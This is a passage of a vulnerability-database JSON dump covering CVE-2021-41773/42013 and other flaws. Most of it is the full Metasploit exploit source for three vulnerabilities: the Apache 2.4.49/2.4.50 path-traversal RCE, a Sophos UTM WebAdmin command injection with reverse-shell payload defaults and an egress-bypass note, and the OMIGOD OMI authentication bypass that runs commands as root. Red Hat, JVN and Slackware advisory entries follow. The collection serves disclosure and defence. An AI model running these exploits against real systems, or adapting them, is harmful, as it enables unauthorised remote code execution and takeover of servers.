This vulnerability has been reintroduced in Apache 2.4.50 fix (CVE-2021-42013).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-08T11:22:47", "type": "metasploit", "title": "Apache 2.4.49/2.4.50 Traversal RCE", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-10T13:01:15", "id": "MSF:EXPLOIT-MULTI-HTTP-APACHE_NORMALIZE_PATH_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/apache_normalize_path_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n include Msf::Exploit::Remote::CheckModule\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Apache 2.4.49/2.4.50 Traversal RCE',\n 'Description' => %q{\n This module exploit an unauthenticated RCE vulnerability which exists in Apache version 2.4.49 
(CVE-2021-41773).\n If files outside of the document root are not protected by \u2018require all denied\u2019 and CGI has been explicitly enabled,\n it can be used to execute arbitrary commands (Remote Command Execution).\n This vulnerability has been reintroduced in Apache 2.4.50 fix (CVE-2021-42013).\n },\n 'References' => [\n ['CVE', '2021-41773'],\n ['CVE', '2021-42013'],\n ['URL', 'https://httpd.apache.org/security/vulnerabilities_24.html'],\n ['URL', 'https://github.com/RootUp/PersonalStuff/blob/master/http-vuln-cve-2021-41773.nse'],\n ['URL', 'https://github.com/projectdiscovery/nuclei-templates/blob/master/vulnerabilities/apache/apache-httpd-rce.yaml'],\n ['URL', 'https://github.com/projectdiscovery/nuclei-templates/commit/9384dd235ec5107f423d930ac80055f2ce2bff74'],\n ['URL', 'https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis']\n ],\n 'Author' => [\n 'Ash Daulton', # Vulnerability discovery\n 'Dhiraj Mishra', # Metasploit auxiliary module\n 'mekhalleh (RAMELLA S\u00e9bastien)' # Metasploit exploit module (Zeop Entreprise)\n ],\n 'DisclosureDate' => '2021-05-10',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],\n 'DefaultOptions' => {\n 'CheckModule' => 'auxiliary/scanner/http/apache_normalize_path',\n 'Action' => 'CHECK_RCE',\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Targets' => [\n [\n 'Automatic (Dropper)',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',\n 'DisablePayloadHandler' => 'false'\n }\n }\n ],\n [\n 'Unix Command (In-Memory)',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_command,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/generic',\n 'DisablePayloadHandler' => 'true'\n }\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => 
[IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptEnum.new('CVE', [true, 'The vulnerability to use', 'CVE-2021-42013', ['CVE-2021-41773', 'CVE-2021-42013']]),\n OptInt.new('DEPTH', [true, 'Depth for Path Traversal', 5]),\n OptString.new('TARGETURI', [true, 'Base path', '/cgi-bin'])\n ])\n end\n\n def cmd_unix_generic?\n datastore['PAYLOAD'] == 'cmd/unix/generic'\n end\n\n def execute_command(command, _opts = {})\n traversal = pick_payload * datastore['DEPTH'] << '/bin/sh'\n\n uri = normalize_uri(datastore['TARGETURI'], traversal.to_s)\n response = send_request_raw({\n 'method' => Rex::Text.rand_text_alpha(3..4),\n 'uri' => uri,\n 'data' => \"#{Rex::Text.rand_text_alpha(1..3)}=|echo;#{command}\"\n })\n if response && response.body\n return response.body\n end\n\n false\n end\n\n def message(msg)\n \"#{@proto}://#{datastore['RHOST']}:#{datastore['RPORT']} - #{msg}\"\n end\n\n def pick_payload\n case datastore['CVE']\n when 'CVE-2021-41773'\n payload = '.%2e/'\n when 'CVE-2021-42013'\n payload = '.%%32%65/'\n else\n payload = ''\n end\n\n payload\n end\n\n def exploit\n @proto = (ssl ? 'https' : 'http')\n\n if (!check.eql? 
Exploit::CheckCode::Vulnerable) && !datastore['ForceExploit']\n fail_with(Failure::NotVulnerable, 'The target is not exploitable.')\n end\n\n print_status(message(\"Attempt to exploit for #{datastore['CVE']}\"))\n case target['Type']\n when :linux_dropper\n\n file_name = \"/tmp/#{Rex::Text.rand_text_alpha(4..8)}\"\n cmd = \"echo #{Rex::Text.encode_base64(generate_payload_exe)} | base64 -d > #{file_name}; chmod +x #{file_name}; #{file_name}; rm -f #{file_name}\"\n\n print_status(message(\"Sending #{datastore['PAYLOAD']} command payload\"))\n vprint_status(message(\"Generated command payload: #{cmd}\"))\n\n execute_command(cmd)\n\n register_file_for_cleanup file_name\n when :unix_command\n vprint_status(message(\"Generated payload: #{payload.encoded}\"))\n\n if !cmd_unix_generic?\n execute_command(payload.encoded)\n else\n received = execute_command(payload.encoded.to_s)\n\n print_warning(message('Dumping command output in response'))\n if !received\n print_error(message('Empty response, no command output'))\n\n return\n end\n print_line(received)\n end\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/apache_normalize_path_rce.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-11-03T06:46:28", "description": "This module exploits an SID-based command injection in Sophos UTM's WebAdmin interface to execute shell commands as the root user.\n", "cvss3": {}, "published": "2021-10-28T00:31:03", "type": "metasploit", "title": "Sophos UTM WebAdmin SID Command Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-25223"], "modified": "2021-11-16T15:12:57", "id": "MSF:EXPLOIT-LINUX-HTTP-SOPHOS_UTM_WEBADMIN_SID_CMD_INJECTION-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/sophos_utm_webadmin_sid_cmd_injection/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: 
https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/stopwatch'\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Sophos UTM WebAdmin SID Command Injection',\n 'Description' => %q{\n This module exploits an SID-based command injection in Sophos UTM's\n WebAdmin interface to execute shell commands as the root user.\n },\n 'Author' => [\n # Discovered by unknown researcher(s)\n 'Justin Kennedy', # Analysis and PoC\n 'wvu' # Supplementary analysis and exploit\n ],\n 'References' => [\n ['CVE', '2020-25223'],\n ['URL', 'https://www.sophos.com/en-us/security-advisories/sophos-sa-20200918-sg-webadmin-rce'],\n ['URL', 'https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223'],\n ['URL', 'https://attackerkb.com/assessments/d6e0dff3-dd46-4f19-831d-c3f3f2fa972a']\n ],\n 'DisclosureDate' => '2020-09-18',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_perl_ssl'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 4444,\n 'LPORT' => 443, # XXX: Bypass Sophos UTM's egress filtering\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [FIRST_ATTEMPT_FAIL],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n sleep_time = 
rand(5..10)\n\n injected, elapsed_time = Rex::Stopwatch.elapsed_time do\n inject_cmd(\"sleep #{sleep_time}\", timeout: sleep_time * 1.5)\n end\n\n return CheckCode::Unknown if injected.nil?\n\n vprint_status(\"Elapsed time: #{elapsed_time} seconds\")\n\n # injected == false\n unless injected && elapsed_time > sleep_time\n return CheckCode::Safe('Failed to test command injection.')\n end\n\n # injected == true\n CheckCode::Appears('Successfully tested command injection.')\n end\n\n def exploit\n unless datastore['LPORT'] == 443\n print_warning('LPORT=443 is recommended to bypass egress filtering')\n end\n\n print_status(\"Executing #{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :cmd\n execute_command(payload.encoded)\n when :dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = {})\n # nil or true on success\n if inject_cmd(cmd) == false\n fail_with(Failure::PayloadFailed, \"Failed to execute command: #{cmd}\")\n end\n end\n\n def inject_cmd(cmd, timeout: 3.5)\n vprint_status(\"Injecting command: #{cmd}\")\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'var'),\n 'ctype' => 'application/json; charset=UTF-8', # NOTE: charset is required\n 'data' => {\n 'SID' => \"|#{cmd}|\" # https://perldoc.perl.org/functions/open#Opening-a-filehandle-into-a-command\n }.to_json\n }, timeout)\n\n return unless res\n return false unless res.code == 200 && res.body.include?(alert_msg)\n\n true\n end\n\n def alert_msg\n # {\"RID\":\"\",\"objs\":[{\"js\":\"json_abort(true);\"},{\"alert\":\"Backend connection failed, please click Shift-Reload to try again.\"}]}\n 'Backend connection failed, please click Shift-Reload to try again.'\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/sophos_utm_webadmin_sid_cmd_injection.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-02T03:02:15", "description": "By 
removing the authentication header, an attacker can issue an HTTP request to the OMI management endpoint that will cause it to execute an operating system command as the root user. This vulnerability was patched in OMI version 1.6.8-1 (released September 8th 2021).\n", "cvss3": {}, "published": "2021-10-25T21:36:55", "type": "metasploit", "title": "Microsoft OMI Management Interface Authentication Bypass", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-38647"], "modified": "2021-10-27T15:58:53", "id": "MSF:EXPLOIT-LINUX-MISC-CVE_2021_38647_OMIGOD-", "href": "https://www.rapid7.com/db/modules/exploit/linux/misc/cve_2021_38647_omigod/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n XML_NS = { 'p' => 'http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem' }.freeze\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft OMI Management Interface Authentication Bypass',\n 'Description' => %q{\n By removing the authentication header, an attacker can issue an HTTP request to the OMI management endpoint\n that will cause it to execute an operating system command as the root user. 
This vulnerability was patched in\n OMI version 1.6.8-1 (released September 8th 2021).\n },\n 'Author' => [\n 'Nir Ohfeld', # vulnerability discovery & research\n 'Shir Tamari', # vulnerability discovery & research\n 'Spencer McIntyre', # metasploit module\n 'wvu' # vulnerability research\n ],\n 'References' => [\n ['CVE', '2021-38647'],\n ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647'],\n ['URL', 'https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure'],\n ['URL', 'https://censys.io/blog/understanding-the-impact-of-omigod-cve-2021-38647/'],\n ['URL', 'https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647']\n ],\n 'DisclosureDate' => '2021-09-14',\n 'License' => MSF_LICENSE,\n 'Platform' => ['linux', 'unix'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper\n }\n ]\n ],\n 'DefaultTarget' => 1,\n 'DefaultOptions' => {\n 'RPORT' => 5985,\n 'SSL' => false,\n 'MeterpreterTryToFork' => true\n },\n 'Notes' => {\n 'AKA' => ['OMIGOD'],\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/wsman'])\n ])\n end\n\n def check\n http_res = send_command('id')\n return CheckCode::Unknown if http_res.nil?\n return CheckCode::Safe unless http_res.code == 200\n\n cmd_res = parse_response(http_res)\n return CheckCode::Unknown if cmd_res.nil? 
|| cmd_res[:stdout] !~ /uid=(\\d+)\\(\\S+\\) /\n\n return CheckCode::Vulnerable(\"Command executed as uid #{Regexp.last_match(1)}.\")\n end\n\n def exploit\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n case target['Type']\n when :unix_cmd\n result = execute_command(payload.encoded)\n if result\n print_status(result[:stdout]) unless result[:stdout].blank?\n print_error(result[:stderr]) unless result[:stderr].blank?\n end\n when :linux_dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = {})\n vprint_status(\"Executing command: #{cmd}\")\n res = send_command(cmd)\n\n unless res && res.code == 200\n fail_with(Failure::UnexpectedReply, \"Failed to execute command: #{cmd}\")\n end\n\n parse_response(res)\n end\n\n def parse_response(res)\n return nil unless res&.code == 200\n\n return_code = res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:ReturnCode', XML_NS)&.content.to_i\n unless return_code == 0\n print_error(\"Failed to execute command: #{cmd} (status: #{return_code})\")\n end\n\n {\n return_code: return_code,\n stdout: res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:StdOut', XML_NS)&.content,\n stderr: res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:StdErr', XML_NS)&.content\n }\n end\n\n def send_command(cmd)\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path),\n 'ctype' => 'text/xml;charset=UTF-8',\n 'data' => Nokogiri::XML(<<-ENVELOPE, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)\n <s:Envelope xmlns:s=\"http://www.w3.org/2003/05/soap-envelope\" xmlns:a=\"http://schemas.xmlsoap.org/ws/2004/08/addressing\" xmlns:n=\"http://schemas.xmlsoap.org/ws/2004/09/enumeration\" xmlns:w=\"http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema\" xmlns:h=\"http://schemas.microsoft.com/wbem/wsman/1/windows/shell\" 
xmlns:p=\"http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd\">\n <s:Header>\n <a:To>HTTP://127.0.0.1:5985/wsman/</a:To>\n <w:ResourceURI s:mustUnderstand=\"true\">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI>\n <a:ReplyTo>\n <a:Address s:mustUnderstand=\"true\">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>\n </a:ReplyTo>\n <a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</a:Action>\n <w:MaxEnvelopeSize s:mustUnderstand=\"true\">102400</w:MaxEnvelopeSize>\n <a:MessageID>uuid:#{Faker::Internet.uuid}</a:MessageID>\n <w:OperationTimeout>PT1M30S</w:OperationTimeout>\n <w:Locale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/>\n <p:DataLocale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/>\n <w:OptionSet s:mustUnderstand=\"true\"/>\n <w:SelectorSet>\n <w:Selector Name=\"__cimnamespace\">root/scx</w:Selector>\n </w:SelectorSet>\n </s:Header>\n <s:Body>\n <p:ExecuteScript_INPUT xmlns:p=\"http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem\">\n <p:Script>#{Rex::Text.encode_base64(cmd)}</p:Script>\n <p:Arguments/>\n <p:timeout>0</p:timeout>\n <p:b64encoded>true</p:b64encoded>\n </p:ExecuteScript_INPUT>\n </s:Body>\n </s:Envelope>\n ENVELOPE\n )\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/cve_2021_38647_omigod.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "redhatcve": [{"lastseen": "2023-03-08T05:20:40", "description": "A path traversal and remote code execution flaw was found in Apache HTTP Server 2.4.49 and 2.4.50. A remote attacker could use this flaw to map URLs to files outside the expected document root. Additionally, this flaw could leak the source of interpreted files like CGI scripts. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. 
If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. This is an incomplete fix for CVE-2021-41773.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-07T17:33:09", "type": "redhatcve", "title": "CVE-2021-42013", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2023-03-08T05:13:29", "id": "RH:CVE-2021-42013", "href": "https://access.redhat.com/security/cve/cve-2021-42013", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-08T20:17:01", "description": "An incorrect memory management flaw was found in Squid, where it is vulnerable to a denial of service attack against all clients using the proxy. 
The highest threat from this vulnerability is to system availability.\n#### Mitigation\n\nMitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability. \n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-05-20T11:21:28", "type": "redhatcve", "title": "CVE-2021-31807", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31807"], "modified": "2023-03-08T19:51:35", "id": "RH:CVE-2021-31807", "href": "https://access.redhat.com/security/cve/cve-2021-31807", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2023-03-08T20:16:59", "description": "An incorrect input validation flaw was found in Squid, where it is vulnerable to a denial of service attack against all clients using the proxy. 
The highest threat from this vulnerability is to system availability.\n#### Mitigation\n\nMitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability. \n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-05-20T11:21:28", "type": "redhatcve", "title": "CVE-2021-31806", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31806"], "modified": "2023-03-08T19:51:35", "id": "RH:CVE-2021-31806", "href": "https://access.redhat.com/security/cve/cve-2021-31806", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2023-03-08T05:20:43", "description": "A path traversal flaw was found in Apache 2.4.49. A remote attacker could use this flaw to map URLs to files outside the expected document root. 
Additionally, this flaw could leak the source of interpreted files like CGI scripts.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-05T13:27:36", "type": "redhatcve", "title": "CVE-2021-41773", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2023-03-08T05:11:48", "id": "RH:CVE-2021-41773", "href": "https://access.redhat.com/security/cve/cve-2021-41773", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "jvn": [{"lastseen": "2021-12-28T23:20:08", "description": "Apache HTTP Server provided by The Apache Software Foundation contains a directory traversal vulnerability (CWE-22).\n\n ## Impact\n\nA remote attacker may access files placed outside of the document root that are not protected by \"require all denied\". 
\nMoreover, if CGI scripts are enabled, arbitrary code may be executed.\n\n ## Solution\n\n**Update the Software** \nUpdate to the latest version according to the information provided by the developer.\n\n ## Products Affected\n\n * Apache HTTP Server 2.4.49 and 2.4.50\nAccording to the developer, the issue is caused by an insufficient fix for CVE-2021-41773. \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-08T00:00:00", "type": "jvn", "title": "JVN#51106450: Apache HTTP Server vulnerable to directory traversal", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-08T00:00:00", "id": "JVN:51106450", "href": "http://jvn.jp/en/jp/JVN51106450/index.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "slackware": [{"lastseen": "2023-02-08T16:13:05", "description": "New httpd packages are available for Slackware 14.0, 14.1, 14.2, and -current\nto fix a security issue.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/httpd-2.4.51-i586-1_slack14.2.txz: Upgraded.\n SECURITY: CVE-2021-42013: Path 
Traversal and Remote Code\n Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete\n fix of CVE-2021-41773) (cve.mitre.org)\n It was found that the fix for CVE-2021-41773 in Apache HTTP\n Server 2.4.50 was insufficient. An attacker could use a path\n traversal attack to map URLs to files outside the directories\n configured by Alias-like directives.\n If files outside of these directories are not protected by the\n usual default configuration \"require all denied\", these requests\n can succeed. If CGI scripts are also enabled for these aliased\n paths, this could allow for remote code execution.\n This issue only affects Apache 2.4.49 and Apache 2.4.50 and not\n earlier versions.\n Credits: Reported by Juan Escobar from Dreamlab Technologies,\n Fernando Mu\u00f1oz from NULL Life CTF Team, and Shungo Kumasaka\n For more information, see:\n https://vulners.com/cve/CVE-2021-42013\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! 
:-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/httpd-2.4.51-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/httpd-2.4.51-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/httpd-2.4.51-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/httpd-2.4.51-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/httpd-2.4.51-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/httpd-2.4.51-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware 